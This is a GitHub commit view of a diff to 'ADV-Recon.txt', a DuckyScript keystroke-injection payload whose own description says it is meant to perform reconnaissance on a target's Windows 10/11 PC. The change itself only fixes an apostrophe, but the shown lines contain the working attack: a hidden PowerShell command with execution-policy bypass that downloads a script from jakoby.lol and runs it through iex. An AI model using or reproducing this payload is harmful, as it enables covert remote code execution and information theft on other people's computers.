Update ADV-Recon.txt

This commit is contained in:
Kavitate 2022-12-24 09:45:13 -06:00 committed by GitHub
parent 1fc4c0256a
commit 6c843b1088
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -2,7 +2,7 @@ REM Title: ADV-Recon
REM Author: I am Jakoby
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details.
REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
REM Target: Windows 10, 11
@ -10,4 +10,3 @@ GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
ENTER